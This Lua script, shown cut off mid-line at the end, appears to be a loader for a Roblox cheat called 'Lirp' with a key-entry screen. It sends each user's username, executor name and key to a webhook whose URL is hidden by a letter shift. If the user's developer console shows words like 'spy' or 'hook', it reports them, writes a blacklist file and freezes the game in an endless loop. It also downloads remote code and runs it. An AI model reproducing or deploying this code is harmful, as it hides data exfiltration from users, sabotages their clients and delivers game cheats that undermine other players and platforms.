local function u4(p1, p2, p3)
game:GetService('StarterGui'):SetCore('SendNotification', {
        Title = p1,
        Text = p2,
        Duration = p3,
    })
end

if _G.InjectedGui then
    return u4('Lirp Loader', 'Double Execution Ignoring', 5)
else
    _G.InjectedGui = true
    _G.GuiInjectedOnLoader = true

    if _G.FastLoad then
        LoadText = 'Yes'
    else
        LoadText = 'No'
    end

    local _CoreGui = game:GetService('CoreGui')

    if _CoreGui then
        function Save(p6, p7)
            if typeof(p6) ~= 'UDim2' then
                writefile(p7, tostring(p6))
            else
                local v8 = p6.X.Scale .. ',' .. p6.X.Offset .. ',' .. p6.Y.Scale .. ',' .. p6.Y.Offset

                if not p7:match('%.txt$') then
                    p7 = p7 .. '.txt'
                end

                writefile(p7, v8)
            end
        end
        function Load(p9, p10)
            if isfile(p10) then
                if p9 == 'UDim2' then
                    local v11 = readfile(p10)
                    local v12, v13, v14, v15 = string.match(v11, '([%d%.%-]+),([%d%.%-]+),([%d%.%-]+),([%d%.%-]+)')

                    if v12 and v14 then
                        return UDim2.new(tonumber(v12), tonumber(v13), tonumber(v14), tonumber(v15))
                    else
                        return nil
                    end
                else
                    return readfile(p10)
                end
            else
                return nil
            end
        end

        local u16 = Load('Text', 'Config') or '[Loader] - First Time Loading Script'

        local function u27(p17, p18)
            local v19 = {}
            local v20 = p18 and 19 or 7

            for v21 = 1, #p17 do
                local v22 = string.byte(p17, v21)

                if 65 <= v22 and v22 <= 90 then
                    local v23 = 65
                    local v24 = (v22 - v23 + v20) % 26 + v23

                    table.insert(v19, string.char(v24))
                elseif 97 <= v22 and v22 <= 122 then
                    local v25 = 97
                    local v26 = (v22 - v25 + v20) % 26 + v25

                    table.insert(v19, string.char(v26))
                else
                    table.insert(v19, string.char(v22))
                end
            end

            return table.concat(v19)
        end

        local u28 = false

        local function u36(p29, p30)
            if p30 ~= true or not u28 then
                if p30 then
                    u28 = true
                end

                local _Name = game.Players.LocalPlayer.Name
                local v32 = identifyexecutor() or 'Nil'
                local v33 = getgenv().Key or 'Nil'
                local v34 = http.request or (http_request or request)
                local v35 = '- **Username:** ' .. _Name .. '\n- **Executor:** ' .. v32 .. '\n- **Key:** ' .. v33 .. '\n- **UUID:** ' .. u16 .. '\n- **Extra Information:** ' .. p29

                v34({
                    Url = u27('ammil://wblvhkw.vhf/tib/pxuahhdl/1432477773125128216/OGzsMNqyGaDtaFP-jS4WwyIQpVSFOXL9htkyV8z90D1Rb4hqdGiFIKxJRijib1Q4-xqG', false),
                    Method = 'POST',
                    Headers = {
                        ['Content-Type'] = 'application/json',
                    },
                    Body = game:GetService('HttpService'):JSONEncode({
                        username = _Name,
                        embeds = {
                            {
                                title = 'Lirp | Free',
                                description = v35,
                                color = 14525439,
                            },
                        },
                    }),
                })
            end
        end

        local u37 = false

        if _CoreGui then
            local u38 = nil
            local u39 = nil

            local function u42(p40)
                if not u37 and (p40 and (p40:IsA('Frame') and p40.Name ~= 'WindowingPadding')) then
                    local v41 = string.lower(p40.msg.Text)

                    if not v41:find('replicatedstorage.remotes.meleereplicate') and (not v41:find('rbxassetid://') and (not v41:find('coregui.robloxgui.corescripts/appchatmain') and (v41:find('table') or (v41:find('web') or (v41:find('github') or (v41:find('debug') or (v41:find('spy') or (v41:find('crack') or (v41:find('keyless') or (v41:find('request') or (v41:find('hook') or (v41:find('response') or (v41:find('called') or (v41:find('opened') or v41:find('disc'))))))))))))))) then
                        u36('[Loader]: Spy - ' .. v41, true)
                        Save('92, 33, 33, 33, 23', 'InfYield')

                        p40.msg.Text = 'Main gui loaded'
                        C = true

                        Save('92, 33, 33, 33, 23', 'InfYield')
                        setclipboard(' ')

                        while true do
                            local _ = math.random() * 100 / 300 * 5e44
                        end
                    end
                end
            end
            local function u50()
                local function u48()
                    if u39:FindFirstChild('MainView') then
                        if not u39.MainView:FindFirstChild('ClientLog') then
                            while true do end
                        end

                        local v43, v44, v45 = pairs(_CoreGui.DevConsoleMaster.DevConsoleWindow.DevConsoleUI.MainView.ClientLog:GetChildren())

                        while true do
                            local v46

                            v45, v46 = v43(v44, v45)

                            if v45 == nil then
                                break
                            end

                            u42(v46)
                        end

                        u38 = _CoreGui.DevConsoleMaster.DevConsoleWindow.DevConsoleUI.MainView.ClientLog.ChildAdded:Connect(function(p47)
                            u42(p47)
                        end)
                    end
                end

                u39.ChildRemoved:Connect(function(_)
                    u38:Disconnect()

                    u38 = nil
                end)
                u39.ChildAdded:Connect(function(p49)
                    if p49.Name == 'MainView' then
                        u48()
                    end
                end)
                u48()
            end

            if _CoreGui:FindFirstChild('DevConsoleMaster') then
                u39 = _CoreGui.DevConsoleMaster.DevConsoleWindow.DevConsoleUI

                u50()
            else
                _CoreGui.ChildAdded:Connect(function(p51)
                    if p51.Name == 'DevConsoleMaster' then
                        u39 = _CoreGui.DevConsoleMaster.DevConsoleWindow.DevConsoleUI

                        u50()
                    end
                end)
            end

            Blr = Load('Text', 'InfYield')

            if Blr then
                C = true

                u36('[Script]: BL (C)', true)
                setclipboard(' ')

                while true do
                    local _ = math.random() * 100 / 300 * 5e44
                end
            else
                u4('Lirp Loader', 'Loading Loader 1/3. Fast Load: ' .. LoadText, 2.5)

                if not game:IsLoaded() then
                    u4('Lirp Loader', 'The Game Is Loading Please Wait Until Your Game Loads', 5)
                    game.Loaded:Wait()
                    u4('Lirp Loader', 'Game Has Loaded.', 1)
                end

                local u52 = {
                    FoundGame = false,
                    Load,
                    Name,
                    Status,
                }
                local u53 = {
                    ['Counter Blox'] = {
                        301549746,
                        'https://raw.githubusercontent.com/LirpOfficial/Lirp/refs/heads/main/CounterBlox',
                    },
                    ['Project Delta'] = {
                        7336302630,
                        'https://lirp.mrbrainas.workers.dev/ProjectDelta',
                    },
                    ['Project Delta Border'] = {
                        7353845952,
                        'https://lirp.mrbrainas.workers.dev/ProjectDelta',
                    },
                    ['Project Delta City-13'] = {
                        73594312486948,
                        'https://lirp.mrbrainas.workers.dev/ProjectDelta',
                    },
                }

                local function v60()
                    local v54, v55, v56 = pairs(u53)

                    while true do
                        local v57

                        v56, v57 = v54(v55, v56)

                        if v56 == nil then
                            break
                        end

                        local v58 = v57[1]
                        local v59 = v57[2]

                        if game.PlaceId == v58 then
                            u52.Name = v56
                            u52.Status = 'Undetected'
                            u52.Load = v59

                            break
                        end
                        if not (u52.Name and u52.Load) then
                            u52.Name = 'Unknown'
                            u52.Status = 'Unknown'
                            u52.Load = 'https://raw.githubusercontent.com/LirpOfficial/Lirp/refs/heads/main/Universal'
                        end
                    end
                end

                local v61, u62 = pcall(function()
                    return loadstring(game:HttpGet('https://lirp.mrbrainas.workers.dev/Ky', false))()
                end)

                if u62 and v61 then
                    v60()

                    local u63 = {
                        a = '$512@',
                        b = '*8#74',
                        c = '#9$63',
                        d = '/2$34',
                        e = '%7!86',
                        f = '@1$45',
                        g = '!67#8',
                        h = '&90!1',
                        i = '~4$32',
                        j = '+7#89',
                        k = '|2@10',
                        l = '^5$43',
                        m = '=87#6',
                        n = '(32!1)',
                        o = '[6$54]',
                        p = ']98@7[',
                        q = '$1#23',
                        r = '#4$56',
                        s = '%7#89',
                        t = '+2$34',
                        u = '&5$67',
                        v = '@8$90',
                        w = '^32#1',
                        x = '~65$4',
                        y = '[9#87]',
                        z = '$43@2',
                        A = '!12#5',
                        B = '$67#8',
                        C = '#9$01',
                        D = '%4#32',
                        E = '~78$9',
                        F = '&21@0',
                        G = '^5$43',
                        H = '@87#6',
                        I = '!3$21',
                        J = '+6#54',
                        K = '=9$87',
                        L = '[1$23]',
                        M = '$4#56',
                        N = '&7$89',
                        O = '#2$34',
                        P = '%5$67',
                        Q = '~8$90',
                        R = '$3#21',
                        S = '^6$54',
                        T = '#9$87',
                        U = '&4$32',
                        V = '+7$65',
                        W = '[8$76]',
                        X = '~1$23',
                        Y = '[2#34]',
                        Z = '!3$45',
                        ['0'] = '+6$78',
                        ['1'] = '/9$01',
                        ['2'] = '^4#32',
                        ['3'] = '|7$89',
                        ['4'] = '#2@10',
                        ['5'] = '~5$43',
                        ['6'] = '-8$76',
                        ['7'] = '=3#21',
                        ['8'] = '%6$54',
                        ['9'] = '*9$87',
                        ['!'] = '$/1#25',
                        ['@'] = '+$2#15',
                        ['#'] = '^8$76',
                        ['$'] = '*+4$32',
                        ['%'] = '-5#43',
                        ['^'] = '|=2$34',
                        ['&'] = '~9$87',
                        ['*'] = '#|6$78',
                        ['('] = '><3$21',
                        [')'] = '[9$87]',
                    }

                    local function u70(p64)
                        local v65 = nil
                        local v66 = ''

                        for v67 = 1, #p64 do
                            local v68 = u63[p64:sub(v67, v67)]

                            if v68 then
                                if v65 then
                                    v66 = v66 .. v65 .. '8(!5'
                                    v65 = nil
                                else
                                    v65 = v68
                                end

                                v66 = v66 .. v68
                            end
                        end

                        local v69 = math.floor(#v66 / 2)

                        return v66:sub(1, v69) .. 'x9G#1L' .. v66:sub(v69 + 1)
                    end

                    if u62:find('x9G#1L') then
                        if _G.FastLoad and (getgenv().Key and u70(getgenv().Key) == u62) then
                            loadstring(game:HttpGet(u52.Load, true))()

                            local _ = true

                            u4('Lirp Loader', 'Loading Loader 3/3 - Step 2 Skipped (Fast Load Enabled)', 2.5)
                        else
                            game:GetService('Players')

                            local _UserInputService = game:GetService('UserInputService')
                            local _ScreenGui = Instance.new('ScreenGui', game.CoreGui)

                            _ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Global
                            _ScreenGui.ResetOnSpawn = false
                            _ScreenGui.Name = 'Unknown'

                            if syn then
                                syn.protect_gui(_ScreenGui)
                            end

                            local _Frame = Instance.new('Frame')

                            _Frame.BorderSizePixel = 0
                            _Frame.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
                            _Frame.BackgroundTransparency = 1
                            _Frame.Position = UDim2.new(0.34431, 0, 0.29814, 0)
                            _Frame.Size = UDim2.new(0.31106, 0, 0.40373, 0)
                            _Frame.BorderColor3 = Color3.fromRGB(0, 0, 0)
                            _Frame.Parent = _ScreenGui

                            local _TextBox = Instance.new('TextBox')

                            _TextBox.Name = 'Key'
                            _TextBox.ZIndex = 2
                            _TextBox.BorderSizePixel = 0
                            _TextBox.TextWrapped = true
                            _TextBox.TextSize = 19
                            _TextBox.TextColor3 = Color3.fromRGB(244, 244, 244)
                            _TextBox.BackgroundColor3 = Color3.fromRGB(72, 71, 70)
                            _TextBox.PlaceholderText = 'Please enter your key inside.'
                            _TextBox.FontFace = Font.new('rbxasset://fonts/families/SourceSansPro.json', Enum.FontWeight.Regular, Enum.FontStyle.Normal)
                            _TextBox.Size = UDim2.new(0.82143, 0, 0.15, 0)
                            _TextBox.Position = UDim2.new(0.089, 0, 0.37323, 0)
                            _TextBox.BorderColor3 = Color3.fromRGB(0, 0, 0)
                            _TextBox.Text = getgenv().Key or ''
                            _TextBox.Parent = _Frame

                            local _UICorner = Instance.new('UICorner')

                            _UICorner.CornerRadius = UDim.new(0, 6)
                            _UICorner.Parent = _TextBox

                            local _TextLabel = Instance.new('TextLabel')

                            _TextLabel.Name = 'Title'
                            _TextLabel.ZIndex = 2
                            _TextLabel.TextWrapped = true
                            _TextLabel.TextStrokeTransparency = 0.3
                            _TextLabel.BorderSizePixel = 0
                            _TextLabel.TextSize = 14
                            _TextLabel.TextStrokeColor3 = Color3.fromRGB(222, 222, 222)
                            _TextLabel.TextScaled = true
                            _TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
                            _TextLabel.FontFace = Font.new('rbxasset://fonts/families/SourceSansPro.json', Enum.FontWeight.Regular, Enum.FontStyle.Normal)
                            _TextLabel.TextColor3 = Color3.fromRGB(244, 244, 244)
                            _TextLabel.BackgroundTransparency = 1
                            _TextLabel.Size = UDim2.new(1.26023, 0, 0.61538, 0)
                            _TextLabel.BorderColor3 = Color3.fromRGB(0, 0, 0)
                            _TextLabel.Text = 'Lirp Key System'
                            _TextLabel.Position = UDim2.new(-0.1084, 0, -2.33747, 0)
                            _TextLabel.Parent = _TextBox

                            local _Frame2 = Instance.new('Frame')

                            _Frame2.BorderSizePixel = 0
                            _Frame2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
                            _Frame2.Size = UDim2.new(0.9678, 0, 0.02778, 0)
                            _Frame2.Position = UDim2.new(-0.00219, 0, 1.39899, 0)
                            _Frame2.BorderColor3 = Color3.fromRGB(0, 0, 0)
                            _Frame2.Parent = _TextLabel

                            local _TextButton = Instance.new('TextButton')

                            _TextButton.Name = 'Load'
                            _TextButton.ZIndex = 2
                            _TextButton.TextWrapped = true
                            _TextButton.TextStrokeTransparency = 0.2
                            _TextButton.BorderSizePixel = 0
                            _TextButton.TextColor3 = Color3.fromRGB(255, 255, 255)
                            _TextButton.TextStrokeColor3 = Color3.fromRGB(162, 162, 162)
                            _TextButton.TextSize = 14
                            _TextButton.TextScaled = true
                            _TextButton.BackgroundColor3 = Color3.fromRGB(12, 210, 91)
                            _TextButton.FontFace = Font.new('rbxasset://fonts/families/SourceSansPro.json', Enum.FontWeight.Regular, Enum.FontStyle.Normal)
                            _TextButton.Size = UDim2.new(0.39452, 0, 0.99145, 0)
                            _TextButton.Position = UDim2.new(0, 0, 2.31943, 0)
                            _TextButton.Text = 'Load Script'
                            _TextButton.BorderColor3 = Color3.fromRGB(0, 0, 0)
                            _TextButton.Parent = _TextBox
                            Instance.new('UICorner').Parent = _TextButton

                            local _TextButton2 = Instance.new('TextButton')

                            _TextButton2.Name = 'GetKey'
                            _TextButton2.ZIndex = 2
                            _TextButton2.TextWrapped = true
                            _TextButton2.TextStrokeTransparency = 0.2
                            _TextButton2.BorderSizePixel = 0
                            _TextButton2.TextColor3 = Color3.fromRGB(255, 255, 255)
                            _TextButton2.TextStrokeColor3 = Color3.fromRGB(162, 162, 162)
                            _TextButton2.Text
